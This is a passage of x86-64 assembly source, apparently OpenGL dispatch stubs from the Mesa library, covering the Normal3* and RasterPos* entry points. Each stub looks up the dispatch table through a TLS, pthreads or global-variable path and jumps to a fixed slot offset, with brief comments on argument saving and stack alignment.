jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3dv), .-GL_PREFIX(Normal3dv)
.p2align 4,,15
.globl GL_PREFIX(Normal3f)
.type GL_PREFIX(Normal3f), @function
/*
 * Normal3f: dispatch stub, slot 56 (offset 448).  FP arguments in
 * %xmm0-%xmm2 are spilled to a 24-byte frame across the table-fetch
 * call; the frame size also keeps %rsp 16-byte aligned.
 */
GL_PREFIX(Normal3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 448(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3f), .-GL_PREFIX(Normal3f)
.p2align 4,,15
.globl GL_PREFIX(Normal3fv)
.type GL_PREFIX(Normal3fv), @function
/*
 * Normal3fv: dispatch stub, slot 57 (offset 456).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Normal3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 456(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3fv), .-GL_PREFIX(Normal3fv)
.p2align 4,,15
.globl GL_PREFIX(Normal3i)
.type GL_PREFIX(Normal3i), @function
/*
 * Normal3i: dispatch stub, slot 58 (offset 464).  Argument registers
 * %rdi/%rsi/%rdx are preserved across the table-fetch call; three
 * pushes keep %rsp 16-byte aligned.
 */
GL_PREFIX(Normal3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 464(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3i), .-GL_PREFIX(Normal3i)
.p2align 4,,15
.globl GL_PREFIX(Normal3iv)
.type GL_PREFIX(Normal3iv), @function
/*
 * Normal3iv: dispatch stub, slot 59 (offset 472).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Normal3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 472(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3iv), .-GL_PREFIX(Normal3iv)
.p2align 4,,15
.globl GL_PREFIX(Normal3s)
.type GL_PREFIX(Normal3s), @function
/*
 * Normal3s: dispatch stub, slot 60 (offset 480).  Argument registers
 * %rdi/%rsi/%rdx are preserved across the table-fetch call; three
 * pushes keep %rsp 16-byte aligned.
 */
GL_PREFIX(Normal3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3s), .-GL_PREFIX(Normal3s)
.p2align 4,,15
.globl GL_PREFIX(Normal3sv)
.type GL_PREFIX(Normal3sv), @function
/*
 * Normal3sv: dispatch stub, slot 61 (offset 488).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Normal3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 488(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3sv), .-GL_PREFIX(Normal3sv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2d)
.type GL_PREFIX(RasterPos2d), @function
/*
 * RasterPos2d: dispatch stub, slot 62 (offset 496).  FP arguments in
 * %xmm0/%xmm1 are spilled across the table-fetch call; the frame is
 * 24 bytes (not 16) so %rsp stays 16-byte aligned at the call.
 */
GL_PREFIX(RasterPos2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 496(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2d), .-GL_PREFIX(RasterPos2d)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2dv)
.type GL_PREFIX(RasterPos2dv), @function
/*
 * RasterPos2dv: dispatch stub, slot 63 (offset 504).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos2dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 504(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2dv), .-GL_PREFIX(RasterPos2dv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2f)
.type GL_PREFIX(RasterPos2f), @function
/*
 * RasterPos2f: dispatch stub, slot 64 (offset 512).  FP arguments in
 * %xmm0/%xmm1 are spilled across the table-fetch call; the 24-byte
 * frame keeps %rsp 16-byte aligned at the call.
 */
GL_PREFIX(RasterPos2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 512(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2f), .-GL_PREFIX(RasterPos2f)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2fv)
.type GL_PREFIX(RasterPos2fv), @function
/*
 * RasterPos2fv: dispatch stub, slot 65 (offset 520).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 520(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2fv), .-GL_PREFIX(RasterPos2fv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2i)
.type GL_PREFIX(RasterPos2i), @function
/*
 * RasterPos2i: dispatch stub, slot 66 (offset 528).  Argument
 * registers %rdi/%rsi are preserved across the table-fetch call;
 * %rbp is pushed as padding so %rsp stays 16-byte aligned.
 */
GL_PREFIX(RasterPos2i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2i), .-GL_PREFIX(RasterPos2i)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2iv)
.type GL_PREFIX(RasterPos2iv), @function
/*
 * RasterPos2iv: dispatch stub, slot 67 (offset 536).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos2iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 536(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2iv), .-GL_PREFIX(RasterPos2iv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2s)
.type GL_PREFIX(RasterPos2s), @function
/*
 * RasterPos2s: dispatch stub, slot 68 (offset 544).  Argument
 * registers %rdi/%rsi are preserved across the table-fetch call;
 * %rbp is pushed as padding so %rsp stays 16-byte aligned.
 */
GL_PREFIX(RasterPos2s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2s), .-GL_PREFIX(RasterPos2s)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2sv)
.type GL_PREFIX(RasterPos2sv), @function
/*
 * RasterPos2sv: dispatch stub, slot 69 (offset 552).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos2sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 552(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2sv), .-GL_PREFIX(RasterPos2sv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3d)
.type GL_PREFIX(RasterPos3d), @function
/*
 * RasterPos3d: dispatch stub, slot 70 (offset 560).  FP arguments in
 * %xmm0-%xmm2 are spilled to a 24-byte frame across the table-fetch
 * call; the frame size also keeps %rsp 16-byte aligned.
 */
GL_PREFIX(RasterPos3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 560(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3d), .-GL_PREFIX(RasterPos3d)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3dv)
.type GL_PREFIX(RasterPos3dv), @function
/*
 * RasterPos3dv: dispatch stub, slot 71 (offset 568).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 568(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3dv), .-GL_PREFIX(RasterPos3dv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3f)
.type GL_PREFIX(RasterPos3f), @function
/*
 * RasterPos3f: dispatch stub, slot 72 (offset 576).  FP arguments in
 * %xmm0-%xmm2 are spilled to a 24-byte frame across the table-fetch
 * call; the frame size also keeps %rsp 16-byte aligned.
 */
GL_PREFIX(RasterPos3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 576(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3f), .-GL_PREFIX(RasterPos3f)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3fv)
.type GL_PREFIX(RasterPos3fv), @function
/*
 * RasterPos3fv: dispatch stub, slot 73 (offset 584).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 584(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3fv), .-GL_PREFIX(RasterPos3fv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3i)
.type GL_PREFIX(RasterPos3i), @function
/*
 * RasterPos3i: dispatch stub, slot 74 (offset 592).  Argument
 * registers %rdi/%rsi/%rdx are preserved across the table-fetch call;
 * three pushes keep %rsp 16-byte aligned.
 */
GL_PREFIX(RasterPos3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3i), .-GL_PREFIX(RasterPos3i)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3iv)
.type GL_PREFIX(RasterPos3iv), @function
/*
 * RasterPos3iv: dispatch stub, slot 75 (offset 600).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 600(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3iv), .-GL_PREFIX(RasterPos3iv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3s)
.type GL_PREFIX(RasterPos3s), @function
/*
 * RasterPos3s: dispatch stub, slot 76 (offset 608).  Argument
 * registers %rdi/%rsi/%rdx are preserved across the table-fetch call;
 * three pushes keep %rsp 16-byte aligned.
 */
GL_PREFIX(RasterPos3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3s), .-GL_PREFIX(RasterPos3s)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3sv)
.type GL_PREFIX(RasterPos3sv), @function
/*
 * RasterPos3sv: dispatch stub, slot 77 (offset 616).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 616(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3sv), .-GL_PREFIX(RasterPos3sv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4d)
.type GL_PREFIX(RasterPos4d), @function
/*
 * RasterPos4d: dispatch stub, slot 78 (offset 624).  FP arguments in
 * %xmm0-%xmm3 are spilled across the table-fetch call; the frame is
 * 40 bytes (not 32) so %rsp stays 16-byte aligned at the call.
 */
GL_PREFIX(RasterPos4d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 624(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4d), .-GL_PREFIX(RasterPos4d)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4dv)
.type GL_PREFIX(RasterPos4dv), @function
/*
 * RasterPos4dv: dispatch stub, slot 79 (offset 632).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos4dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 632(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4dv), .-GL_PREFIX(RasterPos4dv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4f)
.type GL_PREFIX(RasterPos4f), @function
/*
 * RasterPos4f: dispatch stub, slot 80 (offset 640).  FP arguments in
 * %xmm0-%xmm3 are spilled across the table-fetch call; the 40-byte
 * frame keeps %rsp 16-byte aligned at the call.
 */
GL_PREFIX(RasterPos4f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 640(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4f), .-GL_PREFIX(RasterPos4f)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4fv)
.type GL_PREFIX(RasterPos4fv), @function
/*
 * RasterPos4fv: dispatch stub, slot 81 (offset 648).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 648(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4fv), .-GL_PREFIX(RasterPos4fv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4i)
.type GL_PREFIX(RasterPos4i), @function
/*
 * RasterPos4i: dispatch stub, slot 82 (offset 656).  Argument
 * registers %rdi/%rsi/%rdx/%rcx are preserved across the table-fetch
 * call; %rbp is pushed as padding so %rsp stays 16-byte aligned.
 */
GL_PREFIX(RasterPos4i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4i), .-GL_PREFIX(RasterPos4i)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4iv)
.type GL_PREFIX(RasterPos4iv), @function
/*
 * RasterPos4iv: dispatch stub, slot 83 (offset 664).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos4iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 664(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4iv), .-GL_PREFIX(RasterPos4iv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4s)
.type GL_PREFIX(RasterPos4s), @function
/*
 * RasterPos4s: dispatch stub, slot 84 (offset 672).  Argument
 * registers %rdi/%rsi/%rdx/%rcx are preserved across the table-fetch
 * call; %rbp is pushed as padding so %rsp stays 16-byte aligned.
 */
GL_PREFIX(RasterPos4s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
